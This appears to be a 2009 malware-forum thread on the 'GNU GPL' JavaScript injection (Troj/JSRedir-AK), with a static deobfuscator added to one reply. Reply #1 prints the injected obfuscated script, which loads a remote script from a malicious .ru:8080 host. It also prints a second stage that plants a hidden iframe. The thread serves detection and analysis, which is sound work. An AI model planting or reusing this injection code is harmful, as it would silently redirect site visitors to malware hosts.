Author Topic: SophosBlog: GNU GPL malware?: Troj/JSRedir-AK  (Read 4867 times)

December 23, 2009, 11:26:08 am

SysAdMini
Ruining the bad guy's day

December 23, 2009, 02:47:08 pm
Reply #1

sursmurf
I came across one of these today. It still hasn't been cleaned, so beware.

Code:
hXXp://www.timinfo.se/
The last line on the main page looks like this:
Code:
<script>/*GNU GPL*/ try{window.onload = function(){var Xyzxot5wjaa8 = document.createElement('s!c)(r(@!i!#^p((t&^!'.replace(/#|&|\!|@|\)|\(|\$|\^/ig, ''));Xyzxot5wjaa8.setAttribute('type', 'text/javascript');Xyzxot5wjaa8.setAttribute('src',  'h)!t$$t&#$p^&:()/#&&(/#)p))^i!c&&h^u^^n)t&^(@&e&#r#&$-^@(c^($o)#(m!!@$.)(@b^$(l@a^!#c#^!&k@$^h)^@a!@^t$@!@^w(o&(r$&&(l)d$#.^)&c)o#!(m^^@!$.&@b@$i^!)!)l#^@d&!@@-(&d!@e&().^!w&$i#n$@^t^e#^r!s@a&#(#^l($^e&^$$o&@()!n^$l#@@i$&(n)@$!e^.^r&!!u#@&:(8^$0(!#@8&#)&0$&/)(t$^-^$o$#n##!l^#@i$)n$(e@.&^#&d#^&$e^&^$/##t$)-^!o)(n!$$l()^i)(n)e#.^@d)))e)(!^/&&^g)&o!#^o&^g$l()!$e)$$@&.^!c(#o^m)!/!$@@k#@i)(c!k@e&&r&.^$d!e(#))/!&@y!^$a&@^@h$@o^o#!.@@^c@#@^o#&^.$((j@!&p#)((/!^'.replace(/\$|&|@|\^|#|\)|\!|\(/ig, ''));Xyzxot5wjaa8.setAttribute('defer', 'defer');Xyzxot5wjaa8.setAttribute('id', 'C()$^g$n!d(&$g&#$f$&9(!7@@)o@1$$2^'.replace(/\!|&|#|\)|\(|@|\$|\^/ig, ''));document.body.appendChild(Xyzxot5wjaa8);}} catch(e) {}</script>
It redirects to:
Code:
hXXp://pichunter-com.blackhatworld.com.bild-de.wintersaleonline.ru:8080/t-online.de/t-online.de/google.com/kicker.de/yahoo.co.jp/
That in turn gives this:

Code:
Yhc77zz = 'p$i@#^c)@h^u@!n!)t^e(&$#r)$$^-!&c(o)$m)@#&.)b)$l$^a&#c!(@k^@)h@&a^(t$(w^o^@#&#r$l^!d$.!$^!(c^$o!&m$@.)b))i&$l(!d)-(d&e##.)@w((i!!(^n@@t@e$#r#s^(a$$l(&@e@&o)&$!n&))l#^$#i$^n@#e$.)r&#u&('.replace(/@|#|\(|\!|\$|\^|\)|&/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Yhc77zz+':8080/index.php?js';
document.body.appendChild(f);
That link is:
Code:
hXXp://pichunter-com.blackhatworld.com.bild-de.wintersaleonline.ru:8080/index.php?js
I haven't been able to download anything from the last link.
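The obfuscation in the post above is purely cosmetic: every string literal is stuffed with junk characters that the script strips at run time with `'<literal>'.replace(/<junk alternation>/ig, '')`. The following is an added example, not code from the original post or from Sophos: a static decoder in JavaScript that finds those literal/regex pairs with a regular expression and applies the same replace itself, so the sample is never executed. The two samples (STAGE1 and STAGE2) are copied from the post; the function names are my own.

```javascript
// Added example, not from the original post or from Sophos: a static decoder for
// the string-padding obfuscation used by the "GNU GPL" injection (Troj/JSRedir-AK).
// Each string literal is padded with junk characters that the script removes at
// run time with  '<literal>'.replace(/<junk alternation>/ig, '').  Instead of
// executing the sample we locate those literal/regex pairs with a regular
// expression and apply the same replace ourselves.

// Constructed samples: the injected <script> tag and the second-stage iframe
// dropper, copied verbatim from the post. String.raw keeps the backslashes in the
// regex literals intact.
const STAGE1 = String.raw`<script>/*GNU GPL*/ try{window.onload = function(){var Xyzxot5wjaa8 = document.createElement('s!c)(r(@!i!#^p((t&^!'.replace(/#|&|\!|@|\)|\(|\$|\^/ig, ''));Xyzxot5wjaa8.setAttribute('type', 'text/javascript');Xyzxot5wjaa8.setAttribute('src',  'h)!t$$t&#$p^&:()/#&&(/#)p))^i!c&&h^u^^n)t&^(@&e&#r#&$-^@(c^($o)#(m!!@$.)(@b^$(l@a^!#c#^!&k@$^h)^@a!@^t$@!@^w(o&(r$&&(l)d$#.^)&c)o#!(m^^@!$.&@b@$i^!)!)l#^@d&!@@-(&d!@e&().^!w&$i#n$@^t^e#^r!s@a&#(#^l($^e&^$$o&@()!n^$l#@@i$&(n)@$!e^.^r&!!u#@&:(8^$0(!#@8&#)&0$&/)(t$^-^$o$#n##!l^#@i$)n$(e@.&^#&d#^&$e^&^$/##t$)-^!o)(n!$$l()^i)(n)e#.^@d)))e)(!^/&&^g)&o!#^o&^g$l()!$e)$$@&.^!c(#o^m)!/!$@@k#@i)(c!k@e&&r&.^$d!e(#))/!&@y!^$a&@^@h$@o^o#!.@@^c@#@^o#&^.$((j@!&p#)((/!^'.replace(/\$|&|@|\^|#|\)|\!|\(/ig, ''));Xyzxot5wjaa8.setAttribute('defer', 'defer');Xyzxot5wjaa8.setAttribute('id', 'C()$^g$n!d(&$g&#$f$&9(!7@@)o@1$$2^'.replace(/\!|&|#|\)|\(|@|\$|\^/ig, ''));document.body.appendChild(Xyzxot5wjaa8);}} catch(e) {}</script>`;

const STAGE2 = String.raw`Yhc77zz = 'p$i@#^c)@h^u@!n!)t^e(&$#r)$$^-!&c(o)$m)@#&.)b)$l$^a&#c!(@k^@)h@&a^(t$(w^o^@#&#r$l^!d$.!$^!(c^$o!&m$@.)b))i&$l(!d)-(d&e##.)@w((i!!(^n@@t@e$#r#s^(a$$l(&@e@&o)&$!n&))l#^$#i$^n@#e$.)r&#u&('.replace(/@|#|\(|\!|\$|\^|\)|&/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Yhc77zz+':8080/index.php?js';
document.body.appendChild(f);`;

// Matches  '<literal>'.replace(/<pattern>/<flags>, '')  and captures all three
// parts. The literal may not contain quotes or backslashes (the sample never
// needs them); the pattern may contain backslash escapes such as \$ or \(.
const PAIR_RE = /'([^'\\]*)'\.replace\(\/((?:[^\/\\]|\\.)+)\/([a-z]*),\s*''\)/g;

// Rebuild the junk-stripping RegExp from its source text, forcing the global
// flag so every junk character is removed, exactly as the sample's /ig does.
function junkRegExp(pattern, flags) {
  return new RegExp(pattern, flags.includes('g') ? flags : flags + 'g');
}

// Return the decoded value of every padded literal, in source order.
function decodePairs(script) {
  return Array.from(script.matchAll(PAIR_RE),
    ([, literal, pattern, flags]) => literal.replace(junkRegExp(pattern, flags), ''));
}

// Rewrite the script with each '<literal>'.replace(...) pair collapsed to the
// plain decoded literal, so the control flow reads normally.
function deobfuscate(script) {
  return script.replace(PAIR_RE, (_, literal, pattern, flags) =>
    "'" + literal.replace(junkRegExp(pattern, flags), '') + "'");
}

// Fold  'a' + NAME + 'b'  where NAME was assigned a plain string literal earlier,
// which is how the second stage builds its hidden iframe src.
function foldConcat(script) {
  const vars = new Map();
  for (const [, name, value] of script.matchAll(/(\w+)\s*=\s*'([^'\\]*)';/g)) {
    vars.set(name, value);
  }
  return script.replace(/'([^'\\]*)'\s*\+\s*(\w+)\s*\+\s*'([^'\\]*)'/g,
    (whole, a, name, b) => (vars.has(name) ? "'" + a + vars.get(name) + b + "'" : whole));
}

// Scan a page for <script> blocks that open with the /*GNU GPL*/ marker and
// report the decoded strings plus any URLs among them.
function findGnuGplInjections(html) {
  const hits = [];
  const tagRe = /<script[^>]*>\s*\/\*GNU GPL\*\/([\s\S]*?)<\/script>/gi;
  for (const [, body] of html.matchAll(tagRe)) {
    const decoded = decodePairs(body);
    hits.push({ decoded, urls: decoded.filter((s) => /^https?:\/\//i.test(s)) });
  }
  return hits;
}

// Usage: decode both stages without loading either in a browser.
console.log('stage 1:', findGnuGplInjections(STAGE1));
console.log('stage 2:\n' + foldConcat(deobfuscate(STAGE2)));
```

The decoder only handles what this family actually does: a constant literal, a constant regex, and one level of string concatenation. It deliberately does not call `eval` or `Function`, so a sample that builds its regex or literal at run time (for example via `String.fromCharCode`) will produce no pairs rather than a wrong answer; treat an empty result on a script that carries the `/*GNU GPL*/` marker as a signal to inspect it by hand.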

December 23, 2009, 02:58:08 pm
Reply #2

SysAdMini

I have seen many of these in the last few days.

I was unable to download anything from the last link either.
Therefore I haven't added these URLs to our list.

December 23, 2009, 07:30:06 pm
Reply #3

SysAdMini


December 24, 2009, 04:52:43 pm
Reply #4

SysAdMini